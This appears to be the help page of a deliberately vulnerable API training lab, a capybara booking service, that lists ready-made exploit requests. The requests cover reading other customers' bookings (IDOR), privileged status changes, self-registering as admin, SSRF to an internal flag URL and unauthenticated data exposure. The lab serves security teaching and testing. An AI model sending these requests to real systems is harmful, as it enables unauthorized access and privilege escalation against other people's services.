Help

Push-button exploit helpers.

Add this header to your Postman/Burp requests:

Vulnerabilities

Read another customer’s booking by ID

Endpoint: GET /api/bookings/{id}

Why vulnerable: You are authenticated as one customer, but the server does not enforce ownership checks on the booking object referenced by the ID.

Request (pretty JSON)
{
  "identity": "customer (alice)",
  "method": "GET",
  "url": "/api/bookings/2",
  "headers": {
    "Authorization": "Bearer "
  }
}
Response (pretty JSON)
(Try it)

(Explanation will appear here after you Try it.)

Customer performs privileged booking status update

Endpoint: PATCH /api/bookings/{id}

Why vulnerable: A customer can perform privileged actions (status transitions + union flags) that should be restricted to authorized roles. The server trusts fields like union_override.

Request (pretty JSON)
{
  "identity": "customer (alice)",
  "method": "PATCH",
  "url": "/api/bookings/1",
  "headers": {
    "Authorization": "Bearer ",
    "Content-Type": "application/json"
  },
  "body": {
    "status": "accepted",
    "union_override": true,
    "price_quoted": 1
  }
}
Response (pretty JSON)
(Try It)

(Explanation will appear here after you Try It.)

Self-register as admin

Endpoint: POST /api/auth/register

Why vulnerable: The API accepts client-controlled fields like role during registration, enabling privilege escalation.

Request (pretty JSON)
{
  "identity": "unauthenticated",
  "method": "POST",
  "url": "/api/auth/register",
  "headers": {
    "Content-Type": "application/json"
  },
  "body": {
    "email": "pwn####@demo.local",
    "password": "password",
    "role": "admin"
  }
}
Response (pretty JSON)
(Try It)

(Explanation will appear here after you Try It.)

Fetch internal service content via attachmentUrl

Endpoint: POST /api/support/tickets

Why vulnerable: The server fetches attachmentUrl server-side without adequate allow-listing, enabling access to internal services.

Request (pretty JSON)
{
  "identity": "customer (alice)",
  "method": "POST",
  "url": "/api/support/tickets",
  "headers": {
    "Authorization": "Bearer ",
    "Content-Type": "application/json"
  },
  "body": {
    "message": "pls see attachment",
    "attachmentUrl": "http://internal-mock:9000/internal/flag"
  }
}
Response (pretty JSON)
(Try It)

(Explanation will appear here after you Try It.)

Sensitive capybara fields returned without auth

Endpoint: GET /api/capybaras/{id}

Why vulnerable: The API should require an Authorization header, but it returns data even when the request is unauthenticated (Broken Auth). The response also includes internal/sensitive fields (Excessive Data Exposure).

Request (pretty JSON)
{
  "identity": "unauthenticated",
  "method": "GET",
  "url": "/api/capybaras/1",
  "headers": {}
}
Response (pretty JSON)
(Try It)

(Explanation will appear here after you Try It.)